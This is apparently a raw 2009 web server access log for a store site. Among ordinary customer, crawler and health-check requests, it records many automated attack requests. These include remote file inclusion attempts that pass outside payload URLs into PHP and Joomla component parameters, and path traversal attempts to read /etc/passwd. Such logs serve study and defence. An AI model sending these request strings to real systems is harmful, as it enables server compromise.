201.171.164.11 - - [13/Jul/2009:00:04:43 -0400] "GET /images/cat_expand.gif HTTP/1.0" 200 79 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11389D471224C000511104D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
201.171.164.11 - - [13/Jul/2009:00:04:48 -0400] "GET /images/cat_collapse.gif HTTP/1.0" 200 76 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11389D471224C000511104D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
86.35.0.115 - - [13/Jul/2009:00:04:48 -0400] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
86.35.0.115 - - [13/Jul/2009:00:04:48 -0400] "GET /logs/access_log.Q109062900%20%20///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
86.35.0.115 - - [13/Jul/2009:00:04:48 -0400] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
121.78.226.120 - - [13/Jul/2009:00:04:55 -0400] "GET /logs/access_log.Q109061300/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
201.171.164.11 - - [13/Jul/2009:00:04:58 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L11389D461A4430006E3104D+M37+ENG HTTP/1.0" 200 49495 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11389D471224C000511104D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
201.171.164.11 - - [13/Jul/2009:00:05:19 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11389D461A4430006E3104D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
201.171.164.11 - - [13/Jul/2009:00:05:20 -0400] "GET /images/login_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
201.171.164.11 - - [13/Jul/2009:00:05:20 -0400] "GET /images/psearch_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
201.171.164.11 - - [13/Jul/2009:00:05:21 -0400] "GET /images/login_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
201.171.164.11 - - [13/Jul/2009:00:05:22 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
89.223.3.98 - - [13/Jul/2009:00:05:42 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.223.3.98 - - [13/Jul/2009:00:05:42 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.223.3.98 - - [13/Jul/2009:00:05:42 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.223.3.98 - - [13/Jul/2009:00:05:42 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.223.3.98 - - [13/Jul/2009:00:05:52 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.223.3.98 - - [13/Jul/2009:00:05:52 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.223.3.98 - - [13/Jul/2009:00:05:52 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.223.3.98 - - [13/Jul/2009:00:05:52 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.170.112.243 - - [13/Jul/2009:00:05:52 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
83.170.112.243 - - [13/Jul/2009:00:05:53 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
83.170.112.243 - - [13/Jul/2009:00:05:53 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
209.59.12.99 - - [13/Jul/2009:00:06:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.223.3.98 - - [13/Jul/2009:00:06:05 -0400] "GET /logs/access_log.Q109051400%20%20/errors.php?error=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.223.3.98 - - [13/Jul/2009:00:06:10 -0400] "GET /logs/access_log.Q109051400%20%20/errors.php?error=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.223.3.98 - - [13/Jul/2009:00:06:16 -0400] "GET /logs/access_log.Q109051800%20%20/errors.php?error=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.223.3.98 - - [13/Jul/2009:00:06:19 -0400] "GET /logs/access_log.Q109051800%20%20/errors.php?error=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.68.70 - - [13/Jul/2009:00:06:20 -0400] "GET /images/items/0016278_thumb.jpg HTTP/1.1" 200 1204 "-" "Googlebot-Image/1.0"
121.78.226.120 - - [13/Jul/2009:00:06:26 -0400] "GET /logs/access_log.Q109061200%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
121.78.226.120 - - [13/Jul/2009:00:07:11 -0400] "GET /logs/access_log.Q109061300%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
218.232.66.36 - - [13/Jul/2009:00:07:20 -0400] "GET /logs/access_log.Q109061200%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
218.232.66.36 - - [13/Jul/2009:00:07:42 -0400] "GET /logs/access_log.Q109061300%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
201.199.194.8 - - [13/Jul/2009:00:08:30 -0400] "GET /administrator/show.php?path=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
201.199.194.8 - - [13/Jul/2009:00:08:30 -0400] "GET /logs/administrator/show.php?path=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
201.199.194.8 - - [13/Jul/2009:00:08:30 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/show.php?path=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
121.78.226.120 - - [13/Jul/2009:00:08:44 -0400] "GET /logs/access_log.Q109061200%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
89.223.3.98 - - [13/Jul/2009:00:09:08 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.223.3.98 - - [13/Jul/2009:00:09:08 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.223.3.98 - - [13/Jul/2009:00:09:14 -0400] "GET /logs/access_log.Q109052100%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.223.3.98 - - [13/Jul/2009:00:09:14 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
86.35.0.115 - - [13/Jul/2009:00:09:17 -0400] "GET /logs/access_log.Q109061600%20%20///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
121.78.226.120 - - [13/Jul/2009:00:09:26 -0400] "GET /logs/access_log.Q109061300%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
207.58.155.223 - - [13/Jul/2009:00:09:47 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://5euroshirts.com/1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
207.58.155.223 - - [13/Jul/2009:00:09:47 -0400] "GET /logs/access_log.Q109052500%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://5euroshirts.com/1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
207.58.155.223 - - [13/Jul/2009:00:09:47 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://5euroshirts.com/1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
207.58.155.223 - - [13/Jul/2009:00:09:47 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://5euroshirts.com/1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:10:03 -0400] "GET //inc/formmail.inc.php?script_root=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:10:03 -0400] "GET /logs//inc/formmail.inc.php?script_root=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:10:04 -0400] "GET /logs/access_log.Q109061500//inc/formmail.inc.php?script_root=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:10:12 -0400] "GET //inc/formmail.inc.php?script_root=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:10:12 -0400] "GET /logs//inc/formmail.inc.php?script_root=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:10:12 -0400] "GET /logs/access_log.Q109061500%20%20//inc/formmail.inc.php?script_root=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:10:15 -0400] "GET //inc/formmail.inc.php?script_root=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:10:15 -0400] "GET /logs//inc/formmail.inc.php?script_root=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:10:15 -0400] "GET /logs/access_log.Q109061500%20%20//inc/formmail.inc.php?script_root=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:10:25 -0400] "GET /logs/access_log.Q109061500%20%20//inc/formmail.inc.php?script_root=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:10:42 -0400] "GET /logs/access_log.Q109052600%20%20//inc/formmail.inc.php?script_root=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:10:45 -0400] "GET /logs/access_log.Q109052600%20%20//inc/formmail.inc.php?script_root=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:10:52 -0400] "GET /logs/access_log.Q109052600%20%20//inc/formmail.inc.php?script_root=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:00:11:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.78.226.120 - - [13/Jul/2009:00:11:32 -0400] "GET /logs/access_log.Q109061200%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:11:48 -0400] "GET /logs/access_log.Q109061500//inc/formmail.inc.php?script_root=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:11:51 -0400] "GET /logs/access_log.Q109061500//inc/formmail.inc.php?script_root=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:11:53 -0400] "GET /logs/access_log.Q109052600//inc/formmail.inc.php?script_root=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:11:55 -0400] "GET /logs/access_log.Q109052600//inc/formmail.inc.php?script_root=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
207.58.155.223 - - [13/Jul/2009:00:11:55 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://5euroshirts.com/1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
207.58.155.223 - - [13/Jul/2009:00:11:55 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://5euroshirts.com/1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:00:11:56 -0400] "GET /logs/access_log.Q109052600//inc/formmail.inc.php?script_root=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
121.78.226.120 - - [13/Jul/2009:00:12:06 -0400] "GET /logs/access_log.Q109061300%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
86.35.0.115 - - [13/Jul/2009:00:12:33 -0400] "GET /logs/access_log.Q109062900///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:00:14:37 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:00:14:37 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:00:14:37 -0400] "GET /logs/access_log.Q109061400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
211.230.156.161 - - [13/Jul/2009:00:14:56 -0400] "GET /logs/access_log.Q109063000%20%20////?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.230.156.161 - - [13/Jul/2009:00:14:56 -0400] "GET /logs/access_log.Q109063000%20%20////?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:15:11 -0400] "GET /phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:15:11 -0400] "GET /logs/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:15:11 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:00:16:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [13/Jul/2009:00:16:28 -0400] "GET /logs/error_log.Q109060700//config.inc.php?path_escape=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
201.232.54.48 - - [13/Jul/2009:00:16:28 -0400] "GET /logs//config.inc.php?path_escape=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
201.232.54.48 - - [13/Jul/2009:00:16:28 -0400] "GET //config.inc.php?path_escape=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
201.232.54.48 - - [13/Jul/2009:00:16:39 -0400] "GET /logs/access_log.Q109060700//config.inc.php?path_escape=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
201.232.54.48 - - [13/Jul/2009:00:16:40 -0400] "GET /logs/error_log.Q109060700/?path_escape=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
201.232.54.48 - - [13/Jul/2009:00:16:40 -0400] "GET /logs/?path_escape=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 9324 "-" "libwww-perl/5.805"
201.232.54.48 - - [13/Jul/2009:00:16:40 -0400] "GET /logs/access_log.Q109060700/?path_escape=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
200.101.70.1 - - [13/Jul/2009:00:16:40 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:16:40 -0400] "GET /phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:16:41 -0400] "GET /logs/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:18:43 -0400] "GET /logs/access_log.Q109052600/?REX[INCLUDE_PATH]=http://articlecentralstation.com/ab.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
200.101.70.1 - - [13/Jul/2009:00:18:44 -0400] "GET /?REX[INCLUDE_PATH]=http://articlecentralstation.com/ab.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
200.101.70.1 - - [13/Jul/2009:00:18:45 -0400] "GET /logs/?REX[INCLUDE_PATH]=http://articlecentralstation.com/ab.txt?? HTTP/1.1" 200 9324 "-" "libwww-perl/5.805"
200.101.70.1 - - [13/Jul/2009:00:19:04 -0400] "GET /logs/access_log.Q109062200/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://articlecentralstation.com/ab.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
200.101.70.1 - - [13/Jul/2009:00:19:05 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://articlecentralstation.com/ab.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
200.101.70.1 - - [13/Jul/2009:00:19:06 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://articlecentralstation.com/ab.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
200.101.70.1 - - [13/Jul/2009:00:19:28 -0400] "GET /logs/access_log.Q109053100/?REX[INCLUDE_PATH]=http://articlecentralstation.com/ab.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
59.22.140.17 - - [13/Jul/2009:00:20:35 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:00:20:35 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:00:20:35 -0400] "GET /logs/access_log.Q109061900%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
211.230.156.161 - - [13/Jul/2009:00:20:45 -0400] "GET /logs/access_log.Q109052000////?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:21:00 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:00:21:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.170.112.243 - - [13/Jul/2009:00:21:11 -0400] "GET /logs/access_log.Q109051900//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
200.101.70.1 - - [13/Jul/2009:00:21:32 -0400] "GET /logs/access_log.Q109063000/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://articlecentralstation.com/ab.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
59.22.140.17 - - [13/Jul/2009:00:21:48 -0400] "GET /logs/access_log.Q109061900/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
211.230.156.161 - - [13/Jul/2009:00:22:30 -0400] "GET /logs/access_log.Q109052000////?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:00:23:06 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:00:23:06 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:00:23:06 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:23:40 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:23:43 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:23:43 -0400] "GET /logs/access_log.Q109060500//phpsecurityadmin/include/logout.php?PSA_PATH=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:23:43 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:23:49 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:23:50 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:00:23:50 -0400] "GET /logs/access_log.Q109060500//phpsecurityadmin/include/logout.php?PSA_PATH=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:00:24:14 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:00:26:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
59.22.140.17 - - [13/Jul/2009:00:26:56 -0400] "GET /logs/access_log.Q109070800%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
91.202.4.158 - - [13/Jul/2009:00:26:59 -0400] "GET /logs/access_log.Q109061400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 255 "-" "Mozilla/3.0 (OS/2; U)"
